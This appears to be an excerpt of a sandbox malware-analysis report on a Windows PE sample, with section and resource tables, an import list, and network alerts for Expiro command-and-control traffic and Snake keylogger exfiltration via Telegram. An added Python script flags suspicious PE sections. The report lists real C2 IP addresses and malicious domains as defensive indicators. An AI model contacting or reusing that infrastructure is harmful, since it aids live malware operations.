.rsrc  | 0xc7000         | 0x2d074      | 0x2d200  | a5c06b4e48eba7577f3c41a22a33014c | False    | 0.8532667503462604  | data               | 7.702124355387422  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf5000         | 0x96000      | 0x95000  | 7f91542c3397ea3ef75e8dc7a4615685 | False    | 0.9705425492869127  | data               | 7.92048352815656   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
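The data-directory and section tables above describe the sample's static layout, and together they carry the finding a reviewer would pull out first: the .reloc section is marked IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE, has 0x95000 bytes of raw data at entropy 7.92, while IMAGE_DIRECTORY_ENTRY_BASERELOC is 0x0, so whatever the section holds, it is not relocations. The script below is an added example, not part of the Joe Sandbox report and not the sample, that parses the same two structures from a PE file and flags that combination. The PE32 image it runs on is constructed in memory; the 7.0 entropy threshold and the three heuristics are assumptions of the example, not values taken from the report.

```python
"""Section-table triage for a PE file: parse the section headers and the BASERELOC
data directory, compute per-section entropy and flag what a reviewer would pull
out of a sandbox section table. Added example; the PE32 image is constructed."""
import math
import struct

IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040   # winnt.h
IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE = 0x02000000, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
HIGH_ENTROPY = 7.0   # assumed threshold: compressed or encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy, the same scale as the report's Entropy column."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes):
    """Return (sections, (baserelic_rva, baserelic_size)) for a PE32 or PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_opt = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    dd_base = opt + (96 if magic == 0x10B else 112)       # data directories, PE32 / PE32+
    num_dirs = struct.unpack_from("<I", image, dd_base - 4)[0]
    reloc_dir = (0, 0)
    if num_dirs > IMAGE_DIRECTORY_ENTRY_BASERELOC:
        reloc_dir = struct.unpack_from("<II", image, dd_base + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC)
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + 40 * i                     # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "chars": chars,
                         "entropy": shannon_entropy(image[rawptr:rawptr + rawsize])})
    return sections, reloc_dir


def flag_sections(sections, reloc_dir):
    """Map section name -> reasons it deserves a second look; empty dict if nothing fires."""
    findings = {}
    for s in sections:
        reasons, c = [], s["chars"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable and executable")
        if s["entropy"] >= HIGH_ENTROPY:
            reasons.append("entropy %.2f, likely packed or encrypted" % s["entropy"])
        if s["name"] == ".reloc" and reloc_dir == (0, 0):
            reasons.append(".reloc section but BASERELOC directory is empty")
        if reasons:
            findings[s["name"]] = reasons
    return findings


def build_pe32(spec, reloc_dir=(0, 0)) -> bytes:
    """Constructed minimal PE32 (headers plus raw section data); enough to parse, not to load."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                             # e_lfanew
    opt = bytearray(224)                                                # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                               # Magic
    struct.pack_into("<I", opt, 92, 16)                                 # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC, *reloc_dir)
    coff = struct.pack("<HHIIIHH", 0x14C, len(spec), 0, 0, 0, len(opt), 0x102)
    raw_ptr = -(-(0x40 + 4 + 20 + 224 + 40 * len(spec)) // 0x200) * 0x200
    table, body, va = bytearray(), bytearray(), 0x1000
    for name, data, chars in spec:
        rawsize = -(-len(data) // 0x200) * 0x200                        # FileAlignment 0x200
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), va, rawsize,
                             raw_ptr + len(body), 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        va += -(-len(data) // 0x1000) * 0x1000                          # SectionAlignment 0x1000
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return image.ljust(raw_ptr, b"\0") + bytes(body)


def demo_image() -> bytes:
    """Constructed sample shaped like the table above: low-entropy .text, RWX .reloc of
    uniform bytes (entropy 8.0) and no BASERELOC directory. Not the analysed file."""
    text = b"\x55\x8b\xec" + b"\x90" * 0x1FD
    stash = bytes(range(256)) * 8
    return build_pe32([
        (".text", text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".reloc", stash, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE
         | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)])
```

On a real file, `flag_sections(*parse_pe(open(path, "rb").read()))` returns the findings keyed by section name; `demo_image()` only supplies the constructed input so the example runs offline. The entropy heuristic alone would also fire on .rsrc here (7.70), so it is the combination with the section flags and the empty BASERELOC entry that singles out .reloc.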
Name      | RVA     | Size   | Type                                                                              | Language | Country       | ZLIB Complexity
RT_ICON   | 0xc75a8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                    | English  | Great Britain | 0.7466216216216216
RT_ICON   | 0xc76d0 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English  | Great Britain | 0.3277027027027027
RT_ICON   | 0xc77f8 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 192                    | English  | Great Britain | 0.3885135135135135
RT_ICON   | 0xc7920 | 0x2e8  | Device independent bitmap graphic, 32 x 64 x 4, image size 0                      | English  | Great Britain | 0.3333333333333333
RT_ICON   | 0xc7c08 | 0x128  | Device independent bitmap graphic, 16 x 32 x 4, image size 0                      | English  | Great Britain | 0.5
RT_ICON   | 0xc7d30 | 0xea8  | Device independent bitmap graphic, 48 x 96 x 8, image size 0                      | English  | Great Britain | 0.2835820895522388
RT_ICON   | 0xc8bd8 | 0x8a8  | Device independent bitmap graphic, 32 x 64 x 8, image size 0                      | English  | Great Britain | 0.37906137184115524
RT_ICON   | 0xc9480 | 0x568  | Device independent bitmap graphic, 16 x 32 x 8, image size 0                      | English  | Great Britain | 0.23699421965317918
RT_ICON   | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0                     | English  | Great Britain | 0.13858921161825727
RT_ICON   | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0                     | English  | Great Britain | 0.25070356472795496
RT_ICON   | 0xcd038 | 0x468  | Device independent bitmap graphic, 16 x 32 x 32, image size 0                     | English  | Great Britain | 0.3173758865248227
RT_MENU   | 0xcd4a0 | 0x50   | data                                                                              | English  | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594  | data                                                                              | English  | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a  | data                                                                              | English  | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490  | data                                                                              | English  | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc  | data                                                                              | English  | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c  | data                                                                              | English  | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466  | data                                                                              | English  | Great Britain | 0.3605683836589698
                                                                                                                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                              RT_RCDATA0xcf7b80x24339data1.0003776613322004
                                                                                                                                                                              RT_GROUP_ICON0xf3af40x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                              RT_GROUP_ICON0xf3b6c0x14dataEnglishGreat Britain1.25
                                                                                                                                                                              RT_GROUP_ICON0xf3b800x14dataEnglishGreat Britain1.15
                                                                                                                                                                              RT_GROUP_ICON0xf3b940x14dataEnglishGreat Britain1.25
                                                                                                                                                                              RT_VERSION0xf3ba80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                              RT_MANIFEST0xf3c840x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
| DLL | Import |
|---|---|
| WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W |
| WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho |
| USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA |
| USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW |
| GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath |
| COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW |
| SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity |
| OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-11T09:26:11.604324+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP |
| 2024-12-11T09:26:11.604324+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49706 | TCP |
| 2024-12-11T09:26:12.597628+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49707 | 18.141.10.107 | 80 | TCP |
| 2024-12-11T09:26:13.665364+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49708 | TCP |
| 2024-12-11T09:26:13.665364+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49708 | TCP |
| 2024-12-11T09:26:14.947022+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49709 | 193.122.6.168 | 80 | TCP |
| 2024-12-11T09:26:15.356321+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 58130 | 1.1.1.1 | 53 | UDP |
| 2024-12-11T09:26:15.459262+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49710 | TCP |
| 2024-12-11T09:26:15.459262+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49710 | TCP |
| 2024-12-11T09:26:22.321994+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49709 | 193.122.6.168 | 80 | TCP |
| 2024-12-11T09:26:24.482915+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.5 | 49716 | 149.154.167.220 | 443 | TCP |
| 2024-12-11T09:26:25.356895+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 63116 | 1.1.1.1 | 53 | UDP |
| 2024-12-11T09:27:14.774279+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49792 | 82.112.184.197 | 80 | TCP |
| 2024-12-11T09:28:02.892689+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49946 | TCP |
| 2024-12-11T09:28:02.892689+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49946 | TCP |
| 2024-12-11T09:28:06.685072+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49952 | TCP |
| 2024-12-11T09:28:06.685072+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49952 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 11, 2024 09:26:07.283063889 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:07.404603004 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:07.408528090 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:07.415178061 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:07.415178061 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:07.536700010 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:07.536837101 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.286230087 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.408804893 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.408904076 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.414887905 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.414907932 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.535690069 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.535701990 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.756006002 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.756110907 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:08.756318092 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.756318092 CET | 49704 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:08.877840996 CET | 80 | 49704 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.269834042 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:09.390229940 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.390312910 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:09.390573978 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:09.390573978 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:09.511007071 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.511049986 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.952672005 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.952682972 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:09.952752113 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:09.952963114 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:10.017432928 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:10.017503023 CET | 49705 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:10.073333979 CET | 80 | 49705 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:10.382893085 CET | 49707 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:10.503318071 CET | 80 | 49707 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:10.507813931 CET | 49707 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:10.574706078 CET | 49707 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:10.574822903 CET | 49707 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:10.695468903 CET | 80 | 49707 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:10.695481062 CET | 80 | 49707 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:11.482453108 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:11.482482910 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:11.482531071 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:11.482640028 CET | 49706 | 80 | 192.168.2.5 | 18.141.10.107 |
| Dec 11, 2024 09:26:11.604324102 CET | 80 | 49706 | 18.141.10.107 | 192.168.2.5 |
| Dec 11, 2024 09:26:12.058533907 CET | 49708 | 80 | 192.168.2.5 | 54.244.188.177 |
| Dec 11, 2024 09:26:12.180787086 CET | 80 | 49708 | 54.244.188.177 | 192.168.2.5 |
| Dec 11, 2024 09:26:12.181022882 CET | 49708 | 80 | 192.168.2.5 | 54.244.188.177 |
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.181054115 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                              Dec 11, 2024 09:26:12.301836967 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.301846981 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597376108 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597516060 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:12.597628117 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:12.625039101 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                              Dec 11, 2024 09:26:13.102772951 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.223254919 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.223383904 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.223695993 CET4970980192.168.2.5193.122.6.168
                                                                                                                                                                              Dec 11, 2024 09:26:13.344494104 CET8049709193.122.6.168192.168.2.5
                                                                                                                                                                              Dec 11, 2024 09:26:13.539892912 CET804970854.244.188.177192.168.2.5
